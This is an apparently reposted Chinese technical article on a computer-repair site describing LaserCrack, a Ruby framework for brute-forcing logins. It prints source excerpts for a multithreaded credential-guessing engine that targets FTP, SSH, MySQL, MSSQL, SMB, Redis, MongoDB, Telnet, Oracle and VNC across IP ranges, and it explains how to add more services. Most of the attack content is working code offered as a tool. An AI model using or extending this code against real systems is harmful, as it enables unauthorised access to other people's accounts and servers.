锦州市广厦电脑维修|上门维修电脑|上门做系统|0416-3905144热诚服务,锦州广厦维修电脑,公司IT外包服务
topFlag1 设为首页
topFlag3 收藏本站
 
maojin003 首 页 公司介绍 服务项目 服务报价 维修流程 IT外包服务 服务器维护 技术文章 常见故障
锦州市广厦电脑维修|上门维修电脑|上门做系统|0416-3905144热诚服务技术文章
LaserCrack:一款可扩展的暴力破解框架

作者: 佚名  日期:2018-07-08 14:33:27   来源: 本站整理

 0×01 简单说明
lasercrack是一款爆力破解工具,现如今市面上常见的暴力工具如hydra,medusa都有着不错的破解效率,不过我还没有找到ruby写的,一方面是想从原理上理解下暴力破解漏洞,另一方面练习一下ruby语言。此工具配置成交互式终端界面,服务爆破脚本可自定义。
0×02 工具结构
主目录中lasercrack.rb控制整体流程,接受用户参数并作出响应。

utils目录中framework.rb是框架核心文件,控制与线程池相关,提供了三种方式的爆破,即单用户单密码,单用户多密码,单密码多用户,目前暂不支持的多用户多密码。其余文件是服务爆破相关文件,其中分为service.rb和serviceattack.rb。

0×03 源码说明
初始化函数定义了一些基本变量可以让用户自行设置,同时载入所有可用的服务爆破类。
    def initialize
      @module = "nil"
      @ip = "nil"
      @port = 0
      @username = "nil"
      @password = "nil"
      @user_file = "nil"
      @pass_file = "nil"
      @verbose = false
      @threads = 10
      @timeout = 10
      @exploithash = {
          "ftp" => FtpAttack.new,
          "ssh" => SshAttack.new,
          "mysql" => MysqlAttack.new,
          "mssql" => MssqlAttack.new,
          "smb" => SmbAttack.new,
          "redis" => RedisAttack.new,
          "mongo" => MongoAttack.new,
          "telnet" => TelnetAttack.new,
          "oracle" => OracleAttack.new,
          "vnc" => VncAttack.new,
      }
    end  
 参数校验函数针对用户输入或未输入的信息进行判断可以使用哪种爆破模式,对还未达到利用条件的参数抛出未定义。
   def checkarg
      flag = true
      if @user_file == "nil" and @pass_file == "nil"
        puts "[*] Exploit by ip/ips..".light_blue
        tmphash = {"ip" => @ip, "port" => @port, "username" => @username, "password" => @password}
        tmphash.each {|key, value|
          if value == "nil" or value == 0
            tmpstr = "[-] "+key+" => "+value.to_s+"    ".light_red
            puts tmpstr.light_red
            flag = false
          end
        }
      else
        return false
      end
      return flag
    end
爆力破解函数载入线程池并批量对服务进行穷举尝试。其中在verbose为false的情况下使用processbar模块动态显示进程条信息。
   def exploit_ips_template
      $semaphore = Mutex.new
      $COUNTER = 0
      $OFFSET = 0
      puts "[*] Starting crack the #{@module}..".light_blue
      puts "[*] target ip: "+@ip.light_blue
      puts "[*] target port: "+@port.light_blue
      @exploithash.each { |key, value|
        if key == @module
          iplist = checkcidr_iprange   if not iplist.nil?
            pool = ThreadPool.new(@threads)
            exploitips = value
            iplist.each { |item|
              pool.process {
                  if exploitips.attack_once(item, @port.to_i, @username, @password, @timeout)
                    result = "[+] Crack it!"+" "*6+item+" "*6+@username+":"+@password
                    $OFFSET += 1
                    $semaphore.lock
                    puts result.light_green
                    $semaphore.unlock
                  else
                    if @verbose
                      $semaphore.lock
                      puts "["+getnow+"]".light_white+" "*6+"Not found! ==> "+item.light_red
                      $semaphore.unlock
                    else
                      $semaphore.lock
                      progressbar = ProgressBar.create(:format => 'Processing: |%b>>%i| %p%% %t', :starting_at => $COUNTER, :total => iplist.length-$OFFSET-1)
                      $semaphore.unlock
                      $COUNTER += 1
                      sleep 0.05
                      if progressbar.finished?
                        puts "finished".light_blue
                      end
                    end
                  end
              }
            }
            gets
          end
        end
      }
    end
服务登录验证函数对用户提供的信息进行验证,返回true或false表明是否可登录成功。用ftp举例,其他服务脚本类似,不做赘述。
    def hit
        begin
            ftp = Net::FTP.new
            ftp.read_timeout = @timeout
            ftp.open_timeout = @timeout
            ftp.connect(@ip, @port)
            ftp.login(@user, @password)
            result = ftp.lastresp

            ftp.close
            if result == "200"
                return true
            else
                return false
            end
        rescue
            return false
        end
    end
0×04 样例测试
测试本地mysql。

由于字典比较小很快就可以出结果。

设置verbose为true,显示攻击详细信息。

0×05 扩展支持服务
如需自己扩充暴力破解服务,需要修改下面几个地方:
lasercrack.rb中将对应的服务添加到数组和字典中,字典里指定对应的端口信息。 

framework.rb中引入对应的attack文件,默认都在utils目录中编写。

 同时init函数中添加exploithash,show函数中增加显示。

0×06 项目地址 
https://github.com/Lucifer1993/lasercrack
 



热门文章
  • 机械革命S1 PRO-02 开机不显示 黑...
  • 联想ThinkPad NM-C641上电掉电点不...
  • 三星一体激光打印机SCX-4521F维修...
  • 通过串口命令查看EMMC擦写次数和判...
  • IIS 8 开启 GZIP压缩来减少网络请求...
  • 索尼kd-49x7500e背光一半暗且闪烁 ...
  • 楼宇对讲门禁读卡异常维修,读卡芯...
  • 新款海信电视机始终停留在开机界面...
  • 常见打印机清零步骤
  • 安装驱动时提示不包含数字签名的解...
  • 共享打印机需要密码的解决方法
  • 图解Windows 7系统快速共享打印机的...
  • 锦州广厦电脑上门维修

    报修电话:13840665804  QQ:174984393 (联系人:毛先生)   
    E-Mail:174984393@qq.com
    维修中心地址:锦州广厦电脑城
    ICP备案/许可证号:辽ICP备2023002984号-1
    上门服务区域: 辽宁锦州市区
    主要业务: 修电脑,电脑修理,电脑维护,上门维修电脑,黑屏蓝屏死机故障排除,无线上网设置,IT服务外包,局域网组建,ADSL共享上网,路由器设置,数据恢复,密码破解,光盘刻录制作等服务

    技术支持:微软等